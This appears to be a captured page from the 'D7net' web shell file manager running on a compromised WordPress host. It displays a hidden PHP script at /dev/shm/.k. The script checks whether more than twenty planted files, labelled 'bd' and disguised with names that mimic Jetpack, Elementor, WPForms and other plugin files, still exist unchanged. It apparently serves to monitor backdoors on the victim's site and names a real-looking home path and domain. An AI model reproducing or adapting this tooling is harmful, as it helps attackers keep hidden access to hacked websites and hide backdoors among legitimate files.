D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.k
back
Copy
<?php $r = '/home/geekvuvb/geektechllc.com'; $x = ["/wp-content/plugins/google-site-kit/third-party/monolog/monolog/src/Monolog/Handler/Slack/config_metadata.php"=>"bd@@243637509@@1512", "/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-forms/src/contact-form/templates/email.response.php"=>"bd@@243581973@@2234", "/wp-content/themes/sydney/inc/modules/hf-builder/components/footer/widget-4/customize.php"=>"bd@@243607319@@1956", "/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/Injector/banner_manager.php"=>"bd@@243581991@@1447", "/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Service/Sigma/nikon.php"=>"bd@@243607356@@675", "/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-forms/dist/blocks/field-image-select/calendarjs.php"=>"bd@@243637566@@1705", "/wp-content/plugins/jetpack/_inc/build/jetpack-modules.min.asset.php"=>"bd@@243581775@@approve_request", "/wp-content/plugins/mojo-marketplace-wp-plugin/vendor/newfold-labs/wp-module-performance/includes/Concerns/new_pass.php"=>"bd@@243637587@@582", "/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Profiler/NodeVisitor/thumb5.php"=>"bd@@243581814@@600", "/wp-content/plugins/google-site-kit/third-party/guzzlehttp/guzzle/src/Exception/xml_saxy_shared.php"=>"bd@@243637628@@1520", "/wp-content/plugins/all-in-one-wp-migration-unlimited-main/lib/view/main/storage-index-notice.php"=>"bd@@243656062@@publish_content", "/wp-content/plugins/jetpack/views/admin/network-activated-notice.php"=>"bd@@243606941@@framework", "/wp-content/plugins/wordpress-importer/php-toolkit/DataLiberation/vendor-patched/rowbot/url/src/State/viewlog.php"=>"bd@@243581857@@1801", "/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/firewall/rule/rules/bots/rule.block.post.googlebots.headers.php"=>"bd@@243637666@@1920", "/wp-content/plugins/wordpress-importer/php-toolkit/DataLiberation/vendor-patched/rowbot/url/src/Component/Host/Math/Exception/planet.php"=>"bd@@243656107@@567", "/wp-content/plugins/wordpress-importer/php-toolkit/DataLiberation/vendor-patched/rowbot/idna/src/class.image.php"=>"bd@@243656118@@1581", "/wp-content/plugins/wordpress-importer/php-toolkit/DataLiberation/vendor-patched/rowbot/punycode/src/Exception/usergroup_16.php"=>"bd@@243581882@@2722", "/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Service/Billing/ocaml.php"=>"bd@@243656122@@675", "/wp-content/plugins/elementor/modules/atomic-widgets/props-resolver/transformers/settings/classes.transformer.php"=>"bd@@243656126@@1814", "/wp-content/plugins/elementor/core/editor/loader/v2/templates/editor.body.v2.view.php"=>"bd@@243656133@@562", "/wp-content/plugins/wordpress-importer/php-toolkit/DataLiberation/vendor-patched/brick/math/src/Exception/admin.cpanel.php"=>"bd@@243607255@@1593", "/wp-content/themes/sydney/inc/modules/hf-builder/components/header/columns/customize.options.php"=>"bd@@243607283@@2527", "/wp-content/plugins/optinmonster/OMAPI/Partners.php"=>"bd@@243580815@@splitter_tool"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');